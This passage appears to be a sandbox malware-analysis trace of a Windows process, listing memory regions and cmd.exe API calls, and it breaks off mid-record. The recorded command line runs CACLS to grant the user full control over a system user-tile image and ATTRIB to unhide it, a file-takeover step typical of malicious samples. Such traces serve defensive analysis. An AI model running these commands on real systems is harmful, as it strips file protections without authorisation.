"\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28103 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28104 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: 
"c:\\windows\\system32\\user32.dll") Region: id = 28105 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28106 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28107 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28108 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28109 start_va = 0x170000 end_va = 0x237fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 28110 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28111 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 614 os_tid = 0x134 Process: id = "429" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0x954" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28112 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28113 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28114 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28115 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 28116 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28117 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28118 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28119 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28120 
start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28121 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28122 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28123 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28124 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28125 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 28126 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 28127 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28128 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28129 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28130 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 28131 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28132 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28133 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28134 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28135 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28136 start_va = 0x380000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 28137 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28138 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28139 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28140 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" 
filename = "" Region: id = 28141 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28142 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 28143 start_va = 0x450000 end_va = 0x550fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 28144 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 28145 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 28146 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 618 os_tid = 0xb08 [0191.579] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbfc | out: lpSystemTimeAsFileTime=0x18fbfc*(dwLowDateTime=0xa718c4c0, dwHighDateTime=0x1d440a9)) [0191.579] GetCurrentProcessId () returned 0x954 [0191.579] GetCurrentThreadId () returned 0xb08 [0191.579] GetTickCount () returned 0x36853 [0191.579] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbf4 | out: lpPerformanceCount=0x18fbf4*=24836809614) returned 1 [0191.580] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0191.580] __set_app_type (_Type=0x1) [0191.580] __p__fmode () returned 0x76b331f4 [0191.580] __p__commode () returned 0x76b331fc [0191.580] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0191.580] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0191.580] 
GetCurrentThreadId () returned 0xb08 [0191.580] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb08) returned 0x38 [0191.580] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.580] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0191.581] SetThreadUILanguage (LangId=0x0) returned 0x409 [0191.581] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0191.581] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb8c | out: phkResult=0x18fb8c*=0x0) returned 0x2 [0191.581] VirtualQuery (in: lpAddress=0x18fbc3, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0191.581] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fb5c, dwLength=0x1c | out: lpBuffer=0x18fb5c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0191.581] GetConsoleOutputCP 
() returned 0x1b5 [0191.581] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.581] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0191.581] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.581] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0191.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.582] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0191.582] _get_osfhandle (_FileHandle=1) returned 0x7 [0191.582] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0191.582] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.582] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0191.582] _get_osfhandle (_FileHandle=0) returned 0x3 [0191.582] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0191.583] GetEnvironmentStringsW () returned 0x220308* [0191.583] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.583] GetEnvironmentStringsW () returned 0x220308* [0191.583] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.583] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eafc | out: phkResult=0x18eafc*=0x40) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0xb8, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, 
lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x0, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegCloseKey (hKey=0x40) returned 0x0 [0191.583] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eafc | out: phkResult=0x18eafc*=0x40) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x40, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x1, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.583] 
RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x0, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.583] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.584] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x4, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x4) returned 0x0 [0191.584] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb04, lpData=0x18eb08, lpcbData=0x18eb00*=0x1000 | out: lpType=0x18eb04*=0x0, lpData=0x18eb08*=0x9, lpcbData=0x18eb00*=0x1000) returned 0x2 [0191.584] RegCloseKey (hKey=0x40) returned 0x0 [0191.584] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0191.584] srand (_Seed=0x5b886399) [0191.584] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" [0191.584] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp\"" [0191.584] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.584] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x221a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0191.584] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.584] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.584] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0191.584] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0191.584] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0191.584] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0191.585] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0191.585] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0191.585] GetEnvironmentStringsW () returned 0x222458* [0191.585] FreeEnvironmentStringsW (penv=0x222458) returned 1 [0191.585] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.585] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0191.585] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0191.585] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0191.585] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 
[0191.585] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0191.585] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0191.585] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0191.585] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f8c8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0191.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18f8c8, lpFilePart=0x18f8c4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f8c4*="Desktop") returned 0x18 [0191.585] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.585] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.585] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.585] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.586] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.586] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f644 | out: lpFindFileData=0x18f644) returned 0x220ae8 [0191.586] FindClose (in: hFindFile=0x220ae8 | out: hFindFile=0x220ae8) returned 1 [0191.586] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0191.586] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0191.586] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0191.586] GetEnvironmentStringsW () returned 0x220308* [0191.586] FreeEnvironmentStringsW (penv=0x220308) returned 1 [0191.586] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 
[0191.587] GetConsoleOutputCP () returned 0x1b5 [0191.587] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0191.587] GetUserDefaultLCID () returned 0x409 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa08, cchData=128 | out: lpLCData="0") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa08, cchData=128 | out: lpLCData="0") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa08, cchData=128 | out: lpLCData="1") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0191.587] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0191.587] setlocale (category=0, locale=".OCP") returned="English_United States.437" 
[0191.588] GetConsoleTitleW (in: lpConsoleTitle=0x2109b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.588] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0191.588] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0191.588] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0191.589] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0191.589] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0191.590] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0191.590] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0191.590] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0191.590] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0191.590] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0191.590] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0191.590] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0191.592] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0191.592] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0191.592] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0191.592] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0191.592] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0191.592] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0191.625] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0191.627] GetConsoleTitleW (in: lpConsoleTitle=0x18f69c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.628] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0191.628] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0191.628] _wcsicmp (_String1="CACLS", _String2="TYPE") returned 
